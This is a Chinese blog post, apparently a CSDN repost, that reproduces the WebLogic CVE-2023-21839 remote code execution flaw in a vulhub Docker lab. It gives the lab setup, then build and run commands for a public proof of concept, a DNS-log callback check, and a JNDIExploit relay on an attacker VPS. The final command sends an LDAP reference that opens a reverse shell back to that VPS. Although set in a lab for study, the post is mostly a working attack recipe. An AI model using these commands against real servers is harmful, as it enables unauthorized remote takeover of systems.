0


CVE-2023-21839漏洞复现

1.漏洞原理

    CVE-2023-21839允许远程用户在未经授权的情况下通过 
IIOP/T3

进行

JNDI lookup

操作,当

JDK

版本过低或本地存在小工具(javaSerializedData)时,这可能会导致

RCE

漏洞。

2.环境搭建

    环境分为如下情况:

    1.攻击机:窗口系统     IP地址:192.168.100.32

    2.漏洞机器: dockers服务   IP地址:192.168.220.134 

    3.VPS机器:博主专项   IP地址:xx.xx.xx.xx   :)

    漏洞机器环境搭建:

   下载项目 vulhub/weblogic/CVE-2023-21839 at master · vulhub/vulhub · GitHub

    在当前目录执行命令  docker-compose up -d

    完成后环境启动7001端口  访问http://192.168.220.134:7001/console即可

    ![](https://img-blog.csdnimg.cn/25e1469a951f440c8476a0728cc94ce2.png)

3.漏洞复现

    1.准备poc 根据如下项目         GitHub - 4ra1n/CVE-2023-21839: Weblogic CVE-2023-21839 RCE (无需Java依赖一键RCE)

    2.安装go环境,本文略过

    3.执行编译命令
cd cmd
go build -o CVE-2023-21839.exe
./CVE-2023-21839.exe -ip 192.168.220.134 -port 7001 -ldap ldap://e6pmrj.dnslog.cn/test
    4.能够进行dns回显

    ![](https://img-blog.csdnimg.cn/7451d89078f04a8e923f7f6dbc59a03b.png)

  5.vps准备 ,准备JNDIExploit-1.4-SNAPSHOT.jar,为反弹shell做准备

     打开vps,一个终端进行端口监听

     ![](https://img-blog.csdnimg.cn/f20839eec778476c88f3e4dbdde01777.png)

    一个终端进行中转JNDIExploit-1.4-SNAPSHOT.jar 下载可以这里     https://download.csdn.net/download/qq_34914659/87512587

   命令   java -jar JNDIExploit-1.4-SNAPSHOT.jar -i  IP  即可![](https://img-blog.csdnimg.cn/4f4976e9412a4b39b3b58a28aa95cab6.png)

6.然后进行漏洞利用

\CVE-2023-21839.exe -ip 192.168.220.134 -port 7001 -ldap ldap://vpsip:1389/Basic/ReverseShell/vpsip/9999

7.成功反弹shell

参考链接

CVE-2023-21839漏洞本地简单复现

标签: 安全 web安全

本文转载自: https://blog.csdn.net/qq_34914659/article/details/129258109
版权归原作者 热心市民2022 所有, 如有侵权,请联系我们删除。

“CVE-2023-21839漏洞复现”的评论:

还没有评论